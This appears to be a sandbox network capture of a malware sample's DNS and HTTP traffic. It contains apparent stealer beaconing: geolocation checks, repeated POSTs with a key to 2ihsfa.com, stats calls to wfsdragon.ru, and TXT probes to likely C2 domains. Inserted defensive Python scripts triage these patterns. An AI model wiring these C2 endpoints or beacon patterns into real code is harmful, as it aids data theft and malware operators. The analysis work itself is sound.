Remote address: 8.8.8.8:53
  Request:  113.132.67.172.in-addr.arpa IN PTR
  Response: (empty)

Remote address: 8.8.8.8:53
  Request:  113.132.67.172.in-addr.arpa IN PTR

Remote address: 8.8.8.8:53
  Request:  225.243.59.199.in-addr.arpa IN PTR
  Response: (empty)

Remote address: 8.8.8.8:53
  Request:  225.243.59.199.in-addr.arpa IN PTR
Remote address: 186.2.171.3:80
Request:
GET /seemorebty/il.php?e=md9_1sjm HTTP/1.1
Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
Accept-Language: en-US,en;q=0.9
Referer: https://www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
Host: 186.2.171.3
Response:
HTTP/1.1 301 Moved Permanently
Date: Sat, 30 Dec 2023 17:50:48 GMT
Connection: keep-alive
Keep-Alive: timeout=60
Location: https://186.2.171.3/seemorebty/il.php?e=md9_1sjm
Content-Type: text/html; charset=utf8
Content-Length: 568
Remote address: 8.8.8.8:53
  Request:  iplogger.org IN A
  Response: iplogger.org IN A 172.67.132.113
            iplogger.org IN A 104.21.4.208

Remote address: 8.8.8.8:53
  Request:  3.171.2.186.in-addr.arpa IN PTR
  Response: 3.171.2.186.in-addr.arpa IN PTR 12by12ltd

Remote address: 8.8.8.8:53
  Request:  3.171.2.186.in-addr.arpa IN PTR

Remote address: 8.8.8.8:53
  Request:  1.112.95.208.in-addr.arpa IN PTR
  Response: 1.112.95.208.in-addr.arpa IN PTR ip-api.com

Remote address: 8.8.8.8:53
  Request:  1.112.95.208.in-addr.arpa IN PTR

Remote address: 8.8.8.8:53
  Request:  201.178.17.96.in-addr.arpa IN PTR
  Response: 201.178.17.96.in-addr.arpa IN PTR a96-17-178-201.deploy.static.akamaitechnologies.com

Remote address: 8.8.8.8:53
  Request:  201.178.17.96.in-addr.arpa IN PTR

Remote address: 8.8.8.8:53
  Request:  201.178.17.96.in-addr.arpa IN PTR

Remote address: 8.8.8.8:53
  Request:  9.228.82.20.in-addr.arpa IN PTR
  Response: (empty)

Remote address: 8.8.8.8:53
  Request:  x2.i.lencr.org IN A
  Response: x2.i.lencr.org IN CNAME crl.root-x1.letsencrypt.org.edgekey.net
            crl.root-x1.letsencrypt.org.edgekey.net IN CNAME e8652.dscx.akamaiedge.net
            e8652.dscx.akamaiedge.net IN A 173.222.13.40

Remote address: 8.8.8.8:53
  Request:  x2.i.lencr.org IN A

Remote address: 8.8.8.8:53
  Request:  www.facebook.com IN A
  Response: www.facebook.com IN CNAME star-mini.c10r.facebook.com
            star-mini.c10r.facebook.com IN A 163.70.147.35

Remote address: 8.8.8.8:53
  Request:  www.facebook.com IN A
Remote address: 173.222.13.40:80
Request:
GET / HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: x2.i.lencr.org
Response:
HTTP/1.1 200 OK
Content-Type: application/pkix-cert
Last-Modified: Fri, 04 Aug 2023 20:57:55 GMT
ETag: "64cd6653-464"
Content-Disposition: attachment; filename="ISRG Root X2 signed by ISRG Root X1.der"
Cache-Control: max-age=3600
Expires: Sat, 30 Dec 2023 18:50:50 GMT
Date: Sat, 30 Dec 2023 17:50:50 GMT
Content-Length: 1124
Connection: keep-alive
Remote address: 8.8.8.8:53
  Request:  x2.c.lencr.org IN A
  Response: x2.c.lencr.org IN CNAME crl.root-x1.letsencrypt.org.edgekey.net
            crl.root-x1.letsencrypt.org.edgekey.net IN CNAME e8652.dscx.akamaiedge.net
            e8652.dscx.akamaiedge.net IN A 173.222.13.40

Remote address: 8.8.8.8:53
  Request:  40.13.222.173.in-addr.arpa IN PTR
  Response: 40.13.222.173.in-addr.arpa IN PTR a173-222-13-40.deploy.static.akamaitechnologies.com
Remote address: 173.222.13.40:80
Request:
GET / HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: x2.c.lencr.org
Response:
HTTP/1.1 200 OK
Content-Type: application/pkix-crl
Last-Modified: Fri, 04 Aug 2023 20:57:56 GMT
ETag: "64cd6654-12c"
Cache-Control: max-age=3600
Expires: Sat, 30 Dec 2023 18:50:52 GMT
Date: Sat, 30 Dec 2023 17:50:52 GMT
Content-Length: 300
Connection: keep-alive
Remote address: 8.8.8.8:53
  Request:  e1.o.lencr.org IN A
  Response: e1.o.lencr.org IN CNAME o.lencr.edgesuite.net
            o.lencr.edgesuite.net IN CNAME a1887.dscq.akamai.net
            a1887.dscq.akamai.net IN A 96.17.179.201
            a1887.dscq.akamai.net IN A 96.17.179.193
GET http://e1.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBTvkAFw3ViPKmUeIVEf3NC7b1ErqwQUWvPtK%2Fw2wjd5uVIw6lRvz1XLLqwCEgTb71q4OVLvrOAjsfa2O%2Fec4w%3D%3D
Remote address: 96.17.179.201:80
Request:
GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBTvkAFw3ViPKmUeIVEf3NC7b1ErqwQUWvPtK%2Fw2wjd5uVIw6lRvz1XLLqwCEgTb71q4OVLvrOAjsfa2O%2Fec4w%3D%3D HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Microsoft-CryptoAPI/10.0
Host: e1.o.lencr.org
Response:
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
Content-Length: 344
ETag: "5D4309E645E1EFB3642887E5D6D83EAE0DE237FA328BF057983BA457E59206E0"
Last-Modified: Sat, 30 Dec 2023 05:10:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=16451
Expires: Sat, 30 Dec 2023 22:25:04 GMT
Date: Sat, 30 Dec 2023 17:50:53 GMT
Connection: keep-alive
Remote address:8.8.8.8:53Request35.147.70.163.in-addr.arpaIN PTRResponse35.147.70.163.in-addr.arpaIN PTRedge-star-mini-shv-01-lhr6facebookcom
-
Remote address:8.8.8.8:53Request201.179.17.96.in-addr.arpaIN PTRResponse201.179.17.96.in-addr.arpaIN PTRa96-17-179-201deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request50.23.12.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request43.58.199.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request43.58.199.20.in-addr.arpaIN PTR
-
Remote address:8.8.8.8:53Requesthumisnee.comIN AResponsehumisnee.comIN A185.107.56.199
-
Remote address: 8.8.8.8:53
Request: survey-smiles.com IN A
Response: survey-smiles.com IN A 199.59.243.225
-
Remote address: 199.59.243.225:80
Request:
GET / HTTP/1.1
Host: survey-smiles.com
User-Agent: Go-http-client/1.1
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Response:
HTTP/1.1 200 OK
content-type: text/html; charset=utf-8
content-length: 1021
x-request-id: 85fc9a3a-adb6-476a-8080-f978e07b795b
cache-control: no-store, max-age=0
accept-ch: sec-ch-prefers-color-scheme
critical-ch: sec-ch-prefers-color-scheme
vary: sec-ch-prefers-color-scheme
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_GSbXHjSyM4GBXh+TDdQi5Ch6arC3xeKj8KkRwOq4qrqrlRcvBA0AmkBJ57Iam4tUGtRHYm5e3uPQsAB9Z6SRbg==
set-cookie: parking_session=85fc9a3a-adb6-476a-8080-f978e07b795b; expires=Sat, 30 Dec 2023 18:05:58 GMT; path=/
-
Remote address: 8.8.8.8:53
Request: 199.56.107.185.in-addr.arpa IN PTR
Response: (no answer records)
-
Remote address: 8.8.8.8:53
Request: 167.109.18.2.in-addr.arpa IN PTR
Response: 167.109.18.2.in-addr.arpa IN PTR a2-18-109-167.deploy.static.akamaitechnologies.com
-
Remote address: 8.8.8.8:53
Request: uehge4g6gh.2ihsfa.com IN A
Response: uehge4g6gh.2ihsfa.com IN A 13.248.169.48; uehge4g6gh.2ihsfa.com IN A 76.223.54.146
-
Remote address: 13.248.169.48:80
Request:
GET /api/fbtime HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Host: uehge4g6gh.2ihsfa.com
Response:
HTTP/1.1 200 OK
Date: Sat, 30 Dec 2023 17:51:03 GMT
Content-Type: text/html
Content-Length: 12976
Last-Modified: Wed, 13 Dec 2023 20:27:43 GMT
Connection: keep-alive
ETag: "657a13bf-32b0"
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_KaWOJxVo1Wxbcc+AjlokCvPHAVfk+7HAYX4W8r0yTBJuGZf5J86jQ7CZXWc9nzXAYq697W9ZN7boIHgI7mUlIQ
Cache-Control: no-cache
X-Content-Type-Options: nosniff
Set-Cookie: caf_ipaddr=89.149.23.59;Path=/;Max-Age=86400;
Set-Cookie: country=RO;Path=/;Max-Age=86400;
Set-Cookie: city="";Path=/;Max-Age=86400;
Set-Cookie: expiry_partner=;Path=/;Max-Age=86400;
Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400;
Accept-Ranges: bytes
-
Remote address: 13.248.169.48:80
Request:
POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
Response:
HTTP/1.1 405 Not Allowed
Date: Sat, 30 Dec 2023 17:51:05 GMT
Content-Type: text/html
Content-Length: 556
Connection: keep-alive
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UfSjAqNNxaatbpTG2Zbx5oCyJq3ri4cuKdOtSfvtRzwxaQfBhVfnulz/kTOr2fEYq617b6yN0xPVW3kQcZgl6Q
-
Remote address: 13.248.169.48:80
The POST above (POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1, Content-Length 266, identical headers and User-Agent) is repeated 28 more times in the capture. Every repeat received the same HTTP/1.1 405 Not Allowed response (Content-Type: text/html, Content-Length: 556, Connection: keep-alive) carrying the same X-Adblock-Key value as the first. Response Date values for the 28 repeats, all Sat, 30 Dec 2023: 17:51:05 GMT (2), 17:51:06 GMT (5), 17:51:07 GMT (3), 17:51:08 GMT (5), 17:51:09 GMT (4), 17:51:10 GMT (2), 17:51:11 GMT (6), 17:51:12 GMT (1).
-
Remote address: 13.248.169.48:80
Request:
POST /api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5 HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
Content-Length: 266
Host: uehge4g6gh.2ihsfa.com
-
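The run of POSTs to uehge4g6gh.2ihsfa.com above, thirty near-identical requests in about seven seconds, each answered 405 Not Allowed with an X-Adblock-Key header, is what a stealer retrying against a domain that has since been parked looks like; the survey-smiles.com response shows the same parking fingerprints (x-adblock-key, a parking_session cookie). The script below is an added example, not tria.ge's code: it turns a sandbox HTTP log into per-URL groups and flags retry storms that never get a 2xx, lists non-browser User-Agents, and picks out hosts whose responses carry parking markers. The sample records are constructed from the exchanges in this capture (hosts, paths, status codes and the per-second response Date counts); the record layout, the time assumed for the survey-smiles.com request, and the thresholds are this script's own assumptions.

```python
"""Triage of sandbox HTTP traffic: spot a client hammering a dead or parked C2 URL."""
from collections import defaultdict
from datetime import datetime

CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60")

# Constructed records: (time, host, method, path, status or None, user_agent, response headers).
SAMPLE = [
    ("17:50:52", "x2.c.lencr.org", "GET", "/", 200, "Microsoft-CryptoAPI/10.0", {}),
    ("17:50:53", "e1.o.lencr.org", "GET", "/MFMwUTBPME0wSzAJ...", 200, "Microsoft-CryptoAPI/10.0", {}),
    ("17:50:58", "survey-smiles.com", "GET", "/", 200, "Go-http-client/1.1",        # time assumed
     {"x-adblock-key": "MFww...", "set-cookie": "parking_session=85fc9a3a-...; path=/"}),
    ("17:51:03", "uehge4g6gh.2ihsfa.com", "GET", "/api/fbtime", 200, CHROME_UA, {"X-Adblock-Key": "MFww..."}),
]
# 29 answered POSTs, grouped by the response Date second as counted in the capture, plus one
# final POST for which no response was captured.
_POST_PATH = "/api/?sid=0&key=8e56becd9ed99edf57d41e1dd73118c5"
_POST_TIMES = {"17:51:05": 3, "17:51:06": 5, "17:51:07": 3, "17:51:08": 5,
               "17:51:09": 4, "17:51:10": 2, "17:51:11": 6, "17:51:12": 1}
for _t, _n in _POST_TIMES.items():
    SAMPLE += [(_t, "uehge4g6gh.2ihsfa.com", "POST", _POST_PATH, 405, CHROME_UA,
                {"X-Adblock-Key": "MFww..."})] * _n
SAMPLE.append(("17:51:12", "uehge4g6gh.2ihsfa.com", "POST", _POST_PATH, None, CHROME_UA, {}))


def _clock(hhmmss):
    return datetime.strptime(hhmmss, "%H:%M:%S")


def find_retry_storms(records, min_count=5, max_span_s=60):
    """Group requests by (host, method, path) and flag groups with at least min_count requests
    inside max_span_s seconds that never received a 2xx. A dead or parked C2 produces exactly
    this shape; a working one answers 200 and the client stops retrying."""
    groups = defaultdict(list)
    for t, host, method, path, status, _ua, _hdrs in records:
        groups[(host, method, path)].append((_clock(t), status))
    storms = []
    for (host, method, path), hits in groups.items():
        times = sorted(t for t, _ in hits)
        span = (times[-1] - times[0]).total_seconds()
        statuses = {s for _, s in hits if s is not None}
        if len(hits) >= min_count and span <= max_span_s \
                and not any(200 <= s < 300 for s in statuses):
            storms.append({"host": host, "method": method, "path": path, "count": len(hits),
                           "unanswered": sum(1 for _, s in hits if s is None),
                           "span_s": span, "statuses": statuses})
    return storms


def non_browser_agents(records):
    """User-Agents that are not browser-shaped. Separates OS background noise (CryptoAPI) and
    implants that do not bother to impersonate a browser (Go-http-client) from the traffic
    that spoofs Chrome/Edge."""
    return {rec[5] for rec in records if not rec[5].startswith("Mozilla/")}


def parked_hosts(records):
    """Hosts whose responses carry the domain-parking fingerprints seen in this capture."""
    out = set()
    for rec in records:
        hdrs = {k.lower(): v for k, v in rec[6].items()}
        if "x-adblock-key" in hdrs or "parking_session=" in hdrs.get("set-cookie", ""):
            out.add(rec[1])
    return out


if __name__ == "__main__":
    for s in find_retry_storms(SAMPLE):
        print(f"{s['count']} x {s['method']} {s['host']}{s['path']} in {s['span_s']:.0f}s, "
              f"statuses={sorted(s['statuses'])}, unanswered={s['unanswered']}")
    print("non-browser agents:", sorted(non_browser_agents(SAMPLE)))
    print("parked hosts:", sorted(parked_hosts(SAMPLE)))
```

The storm check deliberately ignores the single CryptoAPI and Go-http-client requests: one request to a URL is not a pattern, however odd the client. Tune min_count and max_span_s to the sandbox's run length; the values here are generous for a 151-second capture.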
Remote address: 8.8.8.8:53
Request: 146.78.124.51.in-addr.arpa IN PTR
Response: (no answer records)
-
Remote address: 8.8.8.8:53
Request: 146.78.124.51.in-addr.arpa IN PTR (no response captured)
-
Remote address: 8.8.8.8:53
Request: 146.78.124.51.in-addr.arpa IN PTR (no response captured)
-
Remote address: 8.8.8.8:53
Request: www.iyiqian.com IN A
Response: www.iyiqian.com IN A 34.143.166.163
-
Remote address: 8.8.8.8:53
Request: www.iyiqian.com IN A
Response: www.iyiqian.com IN A 34.143.166.163
-
Remote address: 8.8.8.8:53
Request: www.iyiqian.com IN A
Response: (no answer records)
-
Remote address: 8.8.8.8:53
Request: www.facebook.com IN A
Response: www.facebook.com IN CNAME star-mini.c10r.facebook.com; star-mini.c10r.facebook.com IN A 157.240.221.35
-
Remote address: 8.8.8.8:53
Request: secure.facebook.com IN A
Response: secure.facebook.com IN CNAME secure.c10r.facebook.com; secure.c10r.facebook.com IN A 163.70.147.4
-
Remote address: 34.143.166.163:80
Request:
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Host: www.iyiqian.com
Cache-Control: no-cache
Response:
HTTP/1.1 200 OK
Date: Sat, 30 Dec 2023 17:51:03 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=; path=/; domain=.www.iyiqian.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=; path=/; domain=www.iyiqian.com; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: btst=12e4ff322568ca3994d520e2c0ccdda0|89.149.23.59|1703958663|1703958663|0|1|0; path=/; domain=.iyiqian.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=89.149.23.59; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
-
Remote address: 8.8.8.8:53
Request: static.xx.fbcdn.net IN A
Response: static.xx.fbcdn.net IN CNAME scontent.xx.fbcdn.net; scontent.xx.fbcdn.net IN A 163.70.147.23
-
Remote address: 8.8.8.8:53
Request: static.xx.fbcdn.net IN A (no response captured)
-
Remote address: 8.8.8.8:53
Request: 35.221.240.157.in-addr.arpa IN PTR
Response: 35.221.240.157.in-addr.arpa IN PTR edge-star-mini-shv-01-lhr8.facebook.com
-
Remote address: 8.8.8.8:53
Request: 4.147.70.163.in-addr.arpa IN PTR
Response: 4.147.70.163.in-addr.arpa IN PTR edge-secure-shv-01-lhr6.facebook.com
-
Remote address: 8.8.8.8:53
Request: 227.179.250.142.in-addr.arpa IN PTR
Response: 227.179.250.142.in-addr.arpa IN PTR lhr25s31-in-f3.1e100.net
-
Remote address: 8.8.8.8:53
Request: 74.169.217.172.in-addr.arpa IN PTR
Response: 74.169.217.172.in-addr.arpa IN PTR lhr48s09-in-f10.1e100.net
-
Remote address: 8.8.8.8:53
Request: 23.147.70.163.in-addr.arpa IN PTR
Response: 23.147.70.163.in-addr.arpa IN PTR xx-fbcdn-shv-01-lhr6.fbcdn.net
-
Remote address: 8.8.8.8:53
Request: 23.147.70.163.in-addr.arpa IN PTR (no response captured)
-
Remote address: 8.8.8.8:53
Request: 163.166.143.34.in-addr.arpa IN PTR
Response: 163.166.143.34.in-addr.arpa IN PTR 163.166.143.34.bc.googleusercontent.com
-
Remote address: 8.8.8.8:53
Request: 163.166.143.34.in-addr.arpa IN PTR (no response captured)
-
Remote address: 8.8.8.8:53
Request: 48.169.248.13.in-addr.arpa IN PTR
Response: 48.169.248.13.in-addr.arpa IN PTR a904c694c05102f30.awsglobalaccelerator.com
-
Remote address: 8.8.8.8:53
Request: 48.169.248.13.in-addr.arpa IN PTR (no response captured)
-
Remote address: 8.8.8.8:53
Request: content-autofill.googleapis.com IN A
Response: content-autofill.googleapis.com IN A 142.250.200.42; 142.250.200.10; 216.58.201.106; 216.58.204.74; 172.217.169.10; 142.250.179.234; 142.250.180.10; 142.250.187.202; 142.250.187.234; 172.217.16.234; 142.250.178.10
-
Remote address: 8.8.8.8:53
Request: facebook.com IN A
Response: facebook.com IN A 163.70.147.35
-
Remote address: 8.8.8.8:53
Request: facebook.com IN A (no response captured)
-
Remote address: 8.8.8.8:53
Request: facebook.com IN A (no response captured)
-
Remote address: 8.8.8.8:53
Request: 42.200.250.142.in-addr.arpa IN PTR
Response: 42.200.250.142.in-addr.arpa IN PTR lhr48s30-in-f10.1e100.net
-
Remote address: 8.8.8.8:53
Request: t.me IN A
Response: t.me IN A 149.154.167.99
-
Remote address: 8.8.8.8:53
Request: ninhaine.com IN TXT
Response: (no answer records)
-
Remote address: 8.8.8.8:53
Request: ninhaine.com IN TXT (no response captured)
-
Remote address: 8.8.8.8:53
Request: 2makestorage.com IN TXT
Response: (no answer records)
-
Remote address: 8.8.8.8:53
Request: 2makestorage.com IN TXT (no response captured)
-
Remote address: 8.8.8.8:53
Request: 2makestorage.com IN TXT (no response captured)
-
Remote address: 8.8.8.8:53
Request: 99.167.154.149.in-addr.arpa IN PTR
Response: (no answer records)
-
Remote address: 8.8.8.8:53
Request: nisdably.com IN TXT
Response: nisdably.com IN TXT "v=spf1 include:_incspfcheck.mailspike.net ?all"
-
Remote address: 8.8.8.8:53
Request: nisdably.com IN TXT
Response: (no answer records)
-
Remote address: 8.8.8.8:53
Request: nisdably.com IN TXT
Response: (no answer records)
-
Remote address: 8.8.8.8:53
Request: nisdably.com IN TXT (no response captured)
-
Remote address: 8.8.8.8:53
Request: aucmoney.com IN A
Response: (no answer records)
-
Remote address: 8.8.8.8:53
Request: thegymmum.com IN A
Response: (no answer records)
-
Remote address: 8.8.8.8:53
Request: fe0b449a-bcc8-4a3a-a035-53814b5092ca.ninhaine.com IN TXT
Response: (no answer records)
-
Remote address: 8.8.8.8:53
Request: atvcampingtrips.com IN A
Response: (no answer records)
-
Remote address: 8.8.8.8:53
Request: server2.ninhaine.com IN A
Response: (no answer records)
-
Remote address: 8.8.8.8:53
Request: kuapakualaman.com IN A
Response: (no answer records)
-
Remote address: 8.8.8.8:53
Request: kuapakualaman.com IN A (no response captured)
-
Remote address: 8.8.8.8:53
Request: kuapakualaman.com IN A (no response captured)
-
Remote address: 8.8.8.8:53
Request: renatazarazua.com IN A
Response: (no answer records)
-
Remote address: 8.8.8.8:53
Request: renatazarazua.com IN A (no response captured)
-
Remote address: 8.8.8.8:53
Request: nasufmutlu.com IN A
Response: (no answer records)
-
Remote address: 8.8.8.8:53
Request: server2.ninhaine.com IN A
Response: (no answer records)
-
Remote address: 8.8.8.8:53
Request: spolaect.info IN A (no response captured)
-
Remote address: 8.8.8.8:53
Request: spolaect.info IN A (no response captured)
-
Remote address: 8.8.8.8:53
Request: wfsdragon.ru IN A
Response: wfsdragon.ru IN A 104.21.5.208; wfsdragon.ru IN A 172.67.133.215
-
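The DNS activity above has three features an analyst should pull out rather than read line by line: a sweep of A lookups that all came back empty (aucmoney.com, thegymmum.com, atvcampingtrips.com, kuapakualaman.com, renatazarazua.com, nasufmutlu.com, server2.ninhaine.com, spolaect.info), TXT lookups against domains that have no reason to be consulted for mail policy (the only TXT answer was an SPF record), and a query whose leftmost label is a UUID (fe0b449a-bcc8-4a3a-a035-53814b5092ca.ninhaine.com), which carries a per-victim identifier in the name itself. The script below is an added example, not tria.ge's code; its records are constructed from the queries in this capture, and the classification rules and helper names are this script's own assumptions.

```python
"""Triage of sandbox DNS activity: dead C2 candidates, TXT probes and UUID-labelled names."""
import re

# Constructed records: (qname, qtype, answers). answers is [] when a response with no answer
# records was captured and None when no response was captured at all.
SAMPLE = [
    ("e1.o.lencr.org", "A", ["CNAME o.lencr.edgesuite.net", "A 96.17.179.201"]),
    ("humisnee.com", "A", ["A 185.107.56.199"]),
    ("www.iyiqian.com", "A", ["A 34.143.166.163"]),
    ("www.iyiqian.com", "A", []),
    ("t.me", "A", ["A 149.154.167.99"]),
    ("ninhaine.com", "TXT", []),
    ("ninhaine.com", "TXT", None),
    ("2makestorage.com", "TXT", []),
    ("nisdably.com", "TXT", ["TXT v=spf1 include:_incspfcheck.mailspike.net ?all"]),
    ("aucmoney.com", "A", []),
    ("thegymmum.com", "A", []),
    ("fe0b449a-bcc8-4a3a-a035-53814b5092ca.ninhaine.com", "TXT", []),
    ("atvcampingtrips.com", "A", []),
    ("server2.ninhaine.com", "A", []),
    ("kuapakualaman.com", "A", []),
    ("kuapakualaman.com", "A", None),
    ("renatazarazua.com", "A", []),
    ("nasufmutlu.com", "A", []),
    ("spolaect.info", "A", None),
    ("wfsdragon.ru", "A", ["A 104.21.5.208", "A 172.67.133.215"]),
]

UUID_LABEL = re.compile(
    r"^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\.", re.IGNORECASE)


def registrable(name):
    """Two-label approximation of the registrable domain; adequate for the TLDs in this capture
    (a real tool would consult the public suffix list)."""
    return ".".join(name.split(".")[-2:])


def never_resolved(records):
    """Names queried for A records that got an answer in none of the attempts. A burst of these
    is the signature of a loader walking a list of C2 domains that are no longer registered."""
    asked, answered = set(), set()
    for name, qtype, answers in records:
        if qtype != "A":
            continue
        asked.add(name)
        if answers:
            answered.add(name)
    return sorted(asked - answered)


def txt_probes(records):
    """Registrable domains queried for TXT. Ordinary desktop software rarely issues TXT queries,
    so each one from a sandboxed sample deserves a look, whatever the answer was."""
    return sorted({registrable(name) for name, qtype, _ in records if qtype == "TXT"})


def uuid_labelled(records):
    """Queried names whose leftmost label is a UUID: an identifier smuggled into the query,
    visible to the resolver chain even when the name never resolves."""
    return sorted({name for name, _, _ in records if UUID_LABEL.match(name)})


def summarize(records):
    return {"never_resolved": never_resolved(records),
            "txt_probes": txt_probes(records),
            "uuid_labelled": uuid_labelled(records)}


if __name__ == "__main__":
    for key, names in summarize(SAMPLE).items():
        print(f"{key}:")
        for n in names:
            print(f"  {n}")
```

never_resolved treats a captured-but-empty response and a missing response alike; both mean the sample got nothing usable, which is what matters for deciding whether the domain is a live C2. Names such as www.iyiqian.com that resolved on one attempt and not on another are correctly left out.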
Remote address: 104.21.5.208:80
Request:
GET /api/setStats.php HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: wfsdragon.ru
Response:
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xMf9hJsjRB1ceStMTNv6T1DvX3AXRudPctCToORUoaMW3RBo6wuUJ3xPphBZUroDNkf5KT1Sr6v68o8wMBHEVJFPhPQ0VPx35m6W7WGjaT5zNXO2hoKUvDawAO2B%2FIY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 83dc21916cfb0691-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address: 8.8.8.8:53
Request: 208.5.21.104.in-addr.arpa IN PTR
Response: (no answer records)
-
Remote address: 104.21.5.208:80
Request:
GET /api/setStats.php HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Host: wfsdragon.ru
Response:
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kKWFLyEIXwIJAxgFamSjC7fmRYIxxSkNckMb9bQLZAVopNtS0XBZjprkzTsiwNXAhK5AuX4EvyWlJ9vlpijInQTbK0cigYud7az96DK9MEMznYov3plzAh%2Bv3943aZA%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 83dc219c5f45527f-LHR
alt-svc: h3=":443"; ma=86400
-
Remote address: 8.8.8.8:53
Request: 88.156.103.20.in-addr.arpa IN PTR
Response: (no answer records)
-
Remote address: 8.8.8.8:53
Request: 88.156.103.20.in-addr.arpa IN PTR (no response captured)
-
Remote address: 8.8.8.8:53
Request: 22.236.111.52.in-addr.arpa IN PTR
Response: (no answer records)
-
Remote address: 8.8.8.8:53
Request: tse1.mm.bing.net IN A
Response: tse1.mm.bing.net IN CNAME mm-mm.bing.net.trafficmanager.net; mm-mm.bing.net.trafficmanager.net IN CNAME dual-a-0001.a-msedge.net; dual-a-0001.a-msedge.net IN A 204.79.197.200; dual-a-0001.a-msedge.net IN A 13.107.21.200
-
Remote address: 8.8.8.8:53
Response: (no answer records; no request captured for this record)
-
1.2kB 5.0kB 16 12
-
1.1kB 6.8kB 11 11
-
918 B 6.2kB 10 10
-
260 B 5
-
826 B 662 B 7 4
HTTP Request: GET http://ip-api.com/json/
HTTP Response: 200
-
1.0kB 6.8kB 11 11
-
52 B 1
-
976 B 1.8kB 8 6
-
1.0kB 959 B 5 3
HTTP Request: GET http://186.2.171.3/seemorebty/il.php?e=md9_1sjm
HTTP Response: 301
-
1.0kB 1.9kB 7 6
-
2.5kB 10.7kB 21 20
-
260 B 5
-
397 B 1.7kB 6 5
HTTP Request
GET http://x2.i.lencr.org/
HTTP Response
200 -
7.5kB 224.3kB 118 169
-
500 B 721 B 6 3
HTTP Request
GET http://x2.c.lencr.org/
HTTP Response
200 -
